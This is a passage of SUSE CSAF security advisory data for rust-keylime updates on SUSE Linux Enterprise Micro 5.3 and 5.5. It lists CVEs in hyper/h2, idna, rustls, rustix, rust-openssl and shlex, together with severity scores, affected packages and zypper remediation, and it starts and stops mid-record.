}, { "category": "self", "summary": "SUSE CVE CVE-2023-26964 page", "url": "https://www.suse.com/security/cve/CVE-2023-26964/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-12224 page", "url": "https://www.suse.com/security/cve/CVE-2024-12224/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-43806 page", "url": "https://www.suse.com/security/cve/CVE-2024-43806/" }, { "category": "self", "summary": "SUSE CVE CVE-2025-3416 page", "url": "https://www.suse.com/security/cve/CVE-2025-3416/" }, { "category": "self", "summary": "SUSE CVE CVE-2025-58266 page", "url": "https://www.suse.com/security/cve/CVE-2025-58266/" } ], "title": "Security update for rust-keylime", "tracking": { "current_release_date": "2025-08-15T12:51:37Z", "generator": { "date": "2025-08-15T12:51:37Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "SUSE-SU-2025:02809-1", "initial_release_date": "2025-08-15T12:51:37Z", "revision_history": [ { "date": "2025-08-15T12:51:37Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.7+141-150400.3.7.1.aarch64", "product": { "name": "keylime-ima-policy-0.2.7+141-150400.3.7.1.aarch64", "product_id": "keylime-ima-policy-0.2.7+141-150400.3.7.1.aarch64" } }, { "category": "product_version", "name": "rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "product": { "name": "rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "product_id": "rust-keylime-0.2.7+141-150400.3.7.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.7+141-150400.3.7.1.ppc64le", "product": { "name": "keylime-ima-policy-0.2.7+141-150400.3.7.1.ppc64le", "product_id": "keylime-ima-policy-0.2.7+141-150400.3.7.1.ppc64le" } }, { "category": "product_version", "name": "rust-keylime-0.2.7+141-150400.3.7.1.ppc64le", "product": { "name": "rust-keylime-0.2.7+141-150400.3.7.1.ppc64le", "product_id": "rust-keylime-0.2.7+141-150400.3.7.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.7+141-150400.3.7.1.s390x", "product": { "name": "keylime-ima-policy-0.2.7+141-150400.3.7.1.s390x", "product_id": "keylime-ima-policy-0.2.7+141-150400.3.7.1.s390x" } }, { "category": "product_version", "name": "rust-keylime-0.2.7+141-150400.3.7.1.s390x", "product": { "name": "rust-keylime-0.2.7+141-150400.3.7.1.s390x", "product_id": "rust-keylime-0.2.7+141-150400.3.7.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.7+141-150400.3.7.1.x86_64", "product": { "name": "keylime-ima-policy-0.2.7+141-150400.3.7.1.x86_64", "product_id": "keylime-ima-policy-0.2.7+141-150400.3.7.1.x86_64" } }, { "category": "product_version", "name": "rust-keylime-0.2.7+141-150400.3.7.1.x86_64", "product": { "name": "rust-keylime-0.2.7+141-150400.3.7.1.x86_64", "product_id": "rust-keylime-0.2.7+141-150400.3.7.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "SUSE Linux Enterprise Micro 5.3", "product": { "name": "SUSE Linux Enterprise Micro 5.3", "product_id": "SUSE Linux Enterprise Micro 5.3", "product_identification_helper": { "cpe": "cpe:/o:suse:sle-micro:5.3" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.7+141-150400.3.7.1.aarch64 as component of SUSE Linux Enterprise Micro 5.3", "product_id": "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64" }, "product_reference": "rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "relates_to_product_reference": "SUSE Linux Enterprise Micro 5.3" }, { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.7+141-150400.3.7.1.s390x as component of SUSE Linux Enterprise Micro 5.3", "product_id": "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x" }, "product_reference": "rust-keylime-0.2.7+141-150400.3.7.1.s390x", "relates_to_product_reference": "SUSE Linux Enterprise Micro 5.3" }, { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.7+141-150400.3.7.1.x86_64 as component of SUSE Linux Enterprise Micro 5.3", "product_id": "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" }, "product_reference": "rust-keylime-0.2.7+141-150400.3.7.1.x86_64", "relates_to_product_reference": "SUSE Linux Enterprise Micro 5.3" } ] }, "vulnerabilities": [ { "cve": "CVE-2023-26964", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2023-26964" } ], "notes": [ { "category": "general", "text": "An issue was discovered in hyper v0.13.7. h2-0.2.4 Stream stacking occurs when the H2 component processes HTTP2 RST_STREAM frames. As a result, the memory and CPU usage are high which can lead to a Denial of Service (DoS).", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2023-26964", "url": "https://www.suse.com/security/cve/CVE-2023-26964" }, { "category": "external", "summary": "SUSE Bug 1210339 for CVE-2023-26964", "url": "https://bugzilla.suse.com/1210339" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 4.7, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:37Z", "details": "moderate" } ], "title": "CVE-2023-26964" }, { "cve": "CVE-2024-12224", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-12224" } ], "notes": [ { "category": "general", "text": "Improper Validation of Unsafe Equivalence in punycode by the idna crate from Servo rust-url allows an attacker to create a punycode hostname that one part of a system might treat as distinct while another part of that system would treat as equivalent to another hostname.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-12224", "url": "https://www.suse.com/security/cve/CVE-2024-12224" }, { "category": "external", "summary": "SUSE Bug 1243848 for CVE-2024-12224", "url": "https://bugzilla.suse.com/1243848" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 4.2, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:37Z", "details": "moderate" } ], "title": "CVE-2024-12224" }, { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:37Z", "details": "important" } ], "title": "CVE-2024-32650" }, { "cve": "CVE-2024-43806", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-43806" } ], "notes": [ { "category": "general", "text": "Rustix is a set of safe Rust bindings to POSIX-ish APIs. When using `rustix::fs::Dir` using the `linux_raw` backend, it\u0027s possible for the iterator to \"get stuck\" when an IO error is encountered. Combined with a memory over-allocation issue in `rustix::fs::Dir::read_more`, this can cause quick and unbounded memory explosion (gigabytes in a few seconds if used on a hot path) and eventually lead to an OOM crash of the application. The symptoms were initially discovered in https://github.com/imsnif/bandwhich/issues/284. That post has lots of details of our investigation. Full details can be read on the GHSA-c827-hfw6-qwvm repo advisory. If a program tries to access a directory with its file descriptor after the file has been unlinked (or any other action that leaves the `Dir` iterator in the stuck state), and the implementation does not break after seeing an error, it can cause a memory explosion. As an example, Linux\u0027s various virtual file systems (e.g. `/proc`, `/sys`) can contain directories that spontaneously pop in and out of existence. Attempting to iterate over them using `rustix::fs::Dir` directly or indirectly (e.g. with the `procfs` crate) can trigger this fault condition if the implementation decides to continue on errors. An attacker knowledgeable about the implementation details of a vulnerable target can therefore try to trigger this fault condition via any one or a combination of several available APIs. If successful, the application host will quickly run out of memory, after which the application will likely be terminated by an OOM killer, leading to denial of service. This issue has been addressed in release versions 0.35.15, 0.36.16, 0.37.25, and 0.38.19. Users are advised to upgrade. There are no known workarounds for this issue.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-43806", "url": "https://www.suse.com/security/cve/CVE-2024-43806" }, { "category": "external", "summary": "SUSE Bug 1229376 for CVE-2024-43806", "url": "https://bugzilla.suse.com/1229376" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 6.5, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:37Z", "details": "moderate" } ], "title": "CVE-2024-43806" }, { "cve": "CVE-2025-3416", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2025-3416" } ], "notes": [ { "category": "general", "text": "A flaw was found in OpenSSL\u0027s handling of the properties argument in certain functions. This vulnerability can allow use-after-free exploitation, which may result in undefined behavior or incorrect property parsing, leading to OpenSSL treating the input as an empty string.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2025-3416", "url": "https://www.suse.com/security/cve/CVE-2025-3416" }, { "category": "external", "summary": "SUSE Bug 1242599 for CVE-2025-3416", "url": "https://bugzilla.suse.com/1242599" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 3.7, "baseSeverity": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:37Z", "details": "low" } ], "title": "CVE-2025-3416" }, { "cve": "CVE-2025-58266", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2025-58266" } ], "notes": [ { "category": "general", "text": "unknown", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2025-58266", "url": "https://www.suse.com/security/cve/CVE-2025-58266" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.aarch64", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.s390x", "SUSE Linux Enterprise Micro 5.3:rust-keylime-0.2.7+141-150400.3.7.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:37Z", "details": "important" } ], "title": "CVE-2025-58266" } ] }
suse-su-2025:02811-1
Vulnerability from csaf_suse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Security update for rust-keylime", "title": "Title of the patch" }, { "category": "description", "text": "This update for rust-keylime fixes the following issues:\n\n- Update to version 0.2.7+141:\n * CVE-2025-58266: shlex: Fixed command injection (bsc#1247193)\n \n- Update to version 0.2.7+117:\n * CVE-2023-26964: rust-keylime: hyper,h2: stream stacking when H2 processing HTTP2 RST_STREAM frames (bsc#1210344).\n * CVE-2024-12224: rust-keylime: idna: idna accepts Punycode labels that do not produce any non-ASCII when decoded (bsc#1243861).\n * CVE-2024-32650: rust-keylime: rust-rustls: Infinite loop in rustls::conn::ConnectionCommon:complete_io() with proper client input (bsc#1223234).\n * CVE-2024-43806: rust-keylime: rustix: rustix::fs::Dir iterator with the linux_raw backend can cause memory explosion (bsc#1229952).\n * CVE-2025-3416: rust-keylime: openssl: Use-After-Free in Md::fetch and Cipher::fetch in rust-openssl crate (bsc#1242623).\n * rust-shlex: Multiple issues involving quote API ( RUSTSEC-2024-0006, GHSA-r7qv-8r2h-pg27, bsc#1230029)\n", "title": "Description of the patch" }, { "category": "details", "text": "SUSE-2025-2811,SUSE-SLE-Micro-5.5-2025-2811", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_02811-1.json" }, { "category": "self", "summary": "URL for SUSE-SU-2025:02811-1", "url": "https://www.suse.com/support/update/announcement/2025/suse-su-202502811-1/" }, { "category": "self", "summary": "E-Mail link for SUSE-SU-2025:02811-1", "url": "https://lists.suse.com/pipermail/sle-updates/2025-August/041228.html" }, { "category": "self", "summary": "SUSE Bug 1210344", "url": "https://bugzilla.suse.com/1210344" }, { "category": "self", "summary": "SUSE Bug 1223234", "url": "https://bugzilla.suse.com/1223234" }, { "category": "self", "summary": "SUSE Bug 1229952", "url": "https://bugzilla.suse.com/1229952" }, { "category": "self", "summary": "SUSE Bug 1230029", "url": "https://bugzilla.suse.com/1230029" }, { "category": "self", "summary": "SUSE Bug 1242623", "url": "https://bugzilla.suse.com/1242623" }, { "category": "self", "summary": "SUSE Bug 1243861", "url": "https://bugzilla.suse.com/1243861" }, { "category": "self", "summary": "SUSE Bug 1247193", "url": "https://bugzilla.suse.com/1247193" }, { "category": "self", "summary": "SUSE CVE CVE-2023-26964 page", "url": "https://www.suse.com/security/cve/CVE-2023-26964/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-12224 page", "url": "https://www.suse.com/security/cve/CVE-2024-12224/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-43806 page", "url": "https://www.suse.com/security/cve/CVE-2024-43806/" }, { "category": "self", "summary": "SUSE CVE CVE-2025-3416 page", "url": "https://www.suse.com/security/cve/CVE-2025-3416/" }, { "category": "self", "summary": "SUSE CVE CVE-2025-58266 page", "url": "https://www.suse.com/security/cve/CVE-2025-58266/" } ], "title": "Security update for rust-keylime", "tracking": { "current_release_date": "2025-08-15T12:51:54Z", "generator": { "date": "2025-08-15T12:51:54Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "SUSE-SU-2025:02811-1", "initial_release_date": "2025-08-15T12:51:54Z", "revision_history": [ { "date": "2025-08-15T12:51:54Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.7+141-150500.3.5.1.aarch64", "product": { "name": "keylime-ima-policy-0.2.7+141-150500.3.5.1.aarch64", "product_id": "keylime-ima-policy-0.2.7+141-150500.3.5.1.aarch64" } }, { "category": "product_version", "name": "rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "product": { "name": "rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "product_id": "rust-keylime-0.2.7+141-150500.3.5.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.7+141-150500.3.5.1.ppc64le", "product": { "name": "keylime-ima-policy-0.2.7+141-150500.3.5.1.ppc64le", "product_id": "keylime-ima-policy-0.2.7+141-150500.3.5.1.ppc64le" } }, { "category": "product_version", "name": "rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "product": { "name": "rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "product_id": "rust-keylime-0.2.7+141-150500.3.5.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.7+141-150500.3.5.1.s390x", "product": { "name": "keylime-ima-policy-0.2.7+141-150500.3.5.1.s390x", "product_id": "keylime-ima-policy-0.2.7+141-150500.3.5.1.s390x" } }, { "category": "product_version", "name": "rust-keylime-0.2.7+141-150500.3.5.1.s390x", "product": { "name": "rust-keylime-0.2.7+141-150500.3.5.1.s390x", "product_id": "rust-keylime-0.2.7+141-150500.3.5.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.7+141-150500.3.5.1.x86_64", "product": { "name": "keylime-ima-policy-0.2.7+141-150500.3.5.1.x86_64", "product_id": "keylime-ima-policy-0.2.7+141-150500.3.5.1.x86_64" } }, { "category": "product_version", "name": "rust-keylime-0.2.7+141-150500.3.5.1.x86_64", "product": { "name": "rust-keylime-0.2.7+141-150500.3.5.1.x86_64", "product_id": "rust-keylime-0.2.7+141-150500.3.5.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "SUSE Linux Enterprise Micro 5.5", "product": { "name": "SUSE Linux Enterprise Micro 5.5", "product_id": "SUSE Linux Enterprise Micro 5.5", "product_identification_helper": { "cpe": "cpe:/o:suse:sle-micro:5.5" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.7+141-150500.3.5.1.aarch64 as component of SUSE Linux Enterprise Micro 5.5", "product_id": "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64" }, "product_reference": "rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "relates_to_product_reference": "SUSE Linux Enterprise Micro 5.5" }, { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.7+141-150500.3.5.1.ppc64le as component of SUSE Linux Enterprise Micro 5.5", "product_id": "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le" }, "product_reference": "rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "relates_to_product_reference": "SUSE Linux Enterprise Micro 5.5" }, { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.7+141-150500.3.5.1.s390x as component of SUSE Linux Enterprise Micro 5.5", "product_id": "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x" }, "product_reference": "rust-keylime-0.2.7+141-150500.3.5.1.s390x", "relates_to_product_reference": "SUSE Linux Enterprise Micro 5.5" }, { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.7+141-150500.3.5.1.x86_64 as component of SUSE Linux Enterprise Micro 5.5", "product_id": "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" }, "product_reference": "rust-keylime-0.2.7+141-150500.3.5.1.x86_64", "relates_to_product_reference": "SUSE Linux Enterprise Micro 5.5" } ] }, "vulnerabilities": [ { "cve": "CVE-2023-26964", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2023-26964" } ], "notes": [ { "category": "general", "text": "An issue was discovered in hyper v0.13.7. h2-0.2.4 Stream stacking occurs when the H2 component processes HTTP2 RST_STREAM frames. As a result, the memory and CPU usage are high which can lead to a Denial of Service (DoS).", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2023-26964", "url": "https://www.suse.com/security/cve/CVE-2023-26964" }, { "category": "external", "summary": "SUSE Bug 1210339 for CVE-2023-26964", "url": "https://bugzilla.suse.com/1210339" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 4.7, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:54Z", "details": "moderate" } ], "title": "CVE-2023-26964" }, { "cve": "CVE-2024-12224", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-12224" } ], "notes": [ { "category": "general", "text": "Improper Validation of Unsafe Equivalence in punycode by the idna crate from Servo rust-url allows an attacker to create a punycode hostname that one part of a system might treat as distinct while another part of that system would treat as equivalent to another hostname.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-12224", "url": "https://www.suse.com/security/cve/CVE-2024-12224" }, { "category": "external", "summary": "SUSE Bug 1243848 for CVE-2024-12224", "url": "https://bugzilla.suse.com/1243848" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.ppc64le", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.5:rust-keylime-0.2.7+141-150500.3.5.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 